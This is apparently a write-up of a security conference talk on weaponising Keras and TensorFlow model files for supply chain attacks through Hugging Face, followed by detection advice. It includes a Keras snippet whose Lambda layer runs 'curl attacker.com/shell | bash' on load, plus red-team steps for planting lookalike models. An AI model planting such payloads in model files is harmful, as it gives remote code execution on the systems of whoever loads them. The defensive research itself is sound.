Confused Learning: Supply Chain Attacks through Machine Learning Models
This talk demonstrates how machine learning models can be weaponized to deliver malicious payloads by embedding arbitrary code within model serialization formats like Keras and TensorFlow. The researchers show how attackers can exploit the trust and lack of security controls in public model repositories like Hugging Face to perform supply chain attacks. The presentation provides a practical methodology for red teams to identify, weaponize, and deploy malicious models, while also introducing the 'Bhakti' tool for detecting such threats. The talk emphasizes that ML expertise is not required to execute these attacks, highlighting a significant security gap in current MLOps pipelines.
Weaponizing Machine Learning Models: Arbitrary Code Execution via Model Serialization
TLDR: Machine learning models are not just static data files; they are executable programs that can be weaponized to achieve arbitrary code execution. By embedding malicious payloads into common serialization formats like Keras and TensorFlow, attackers can compromise MLOps pipelines and gain persistent access to internal infrastructure. Security researchers and red teams should treat model files as untrusted input and implement strict static analysis to detect embedded malicious code before deployment.
Machine learning models are the new black boxes of the enterprise. While security teams spend thousands of hours auditing web applications and cloud infrastructure, they often treat model files—the massive, opaque blobs of weights and biases—as inert data. This is a dangerous oversight. As demonstrated in recent research, these files are frequently full-blown software programs that, when loaded by a standard library, execute arbitrary code. If you are a pentester or a bug bounty hunter, you should stop looking at the application layer and start looking at the model supply chain.
The Mechanics of Model Hijacking
The vulnerability lies in how modern machine learning frameworks handle model serialization. Formats like Keras and TensorFlow often allow for the inclusion of custom layers or metadata that can execute arbitrary Python code upon deserialization. When a developer or an automated MLOps pipeline loads a model, the framework interprets these embedded instructions.
Consider the Keras Lambda layer. It is designed to allow developers to define custom operations within a model architecture. However, because it can wrap arbitrary Python expressions, it becomes a trivial vector for code execution. An attacker can craft a model that, when loaded via model.load_model(), executes a reverse shell or fetches a second-stage payload from a remote server.
The following snippet illustrates how easily a malicious layer can be injected into a Keras model:
from tensorflow import keras
# Injecting a payload into a Keras Lambda layer
infusion = keras.layers.Lambda(lambda x: exec("import os; os.system('curl attacker.com/shell | bash')"))
model = keras.Sequential([
keras.layers.Dense(5, input_shape=(3,)),
infusion,
keras.layers.Dense(2, activation='softmax')
])
model.save("malicious_model.h5")
When this model is loaded in a production environment, the exec command runs with the privileges of the user or service account running the model. This is a classic OWASP A03:2021-Injection scenario, but it is happening inside the data science stack, which is often shielded from traditional security tooling.
Exploiting the MLOps Supply Chain
Public model repositories like Hugging Face have become the primary distribution point for pre-trained models. These platforms rely on social proof—stars, downloads, and community trust—to validate the quality of a model. Attackers are already exploiting this by creating "typosquatted" organizations and uploading malicious models that appear to be legitimate, high-performance tools.
During a red team engagement, you don't need to be a machine learning expert to execute this. You need to identify where the target organization pulls its models. If they are using an automated pipeline that pulls from public repositories, you can perform a supply chain attack by uploading a backdoored model that mimics a popular, legitimate one. Once a data scientist or an automated script pulls your model, you have a foothold in their environment.
The impact is significant. Because these models are often deployed in high-privilege environments—such as cloud-based training clusters or production inference servers—you gain immediate access to sensitive data, internal API keys, and the ability to pivot into the broader network.
Detection and Defensive Strategies
Defenders are currently struggling to keep up. Traditional malware scanners like ClamAV are largely ineffective here because they are not designed to parse complex model serialization formats or detect malicious logic embedded within them. Furthermore, many EDR solutions flag the behavior as "normal" because they expect a machine learning model to perform heavy computation and network activity.
To detect these threats, you need to move beyond signature-based scanning. Static analysis is your best bet. Tools like Modelscan are specifically designed to inspect model files for suspicious layers or embedded code without executing them. For more granular control, you can write custom YARA rules to scan for specific patterns, such as the presence of Lambda layers or pickle serialization in model metadata.
If you are performing a security assessment, your methodology should include:
- Inventory: Map out every source of model files in the organization.
- Static Analysis: Use tools like
modelscanor custom scripts to inspect the metadata of these files. - Isolation: Ensure that model loading occurs in a sandboxed environment with no egress traffic, preventing the model from "phoning home" if it is triggered.
The era of treating machine learning models as simple data files is over. As these models become more deeply integrated into critical business processes, they will become a primary target for attackers. If you aren't auditing the models in your supply chain, you are leaving the front door wide open. Start by inspecting the serialization formats and questioning the provenance of every model you pull into your environment. The next major breach might not come from a vulnerable web server, but from a "pre-trained" model that was never meant to be trusted.
Vulnerability Classes
Target Technologies
OWASP Categories
All Tags
Up Next From This Conference

How to Read and Write a High-Level Bytecode Decompiler

Opening Keynote: Black Hat Asia 2024

AI Governance and Security: A Conversation with Singapore's Chief AI Officer
Similar Talks

Kill List: Hacking an Assassination Site on the Dark Web

Counter Deception: Defending Yourself in a World Full of Lies

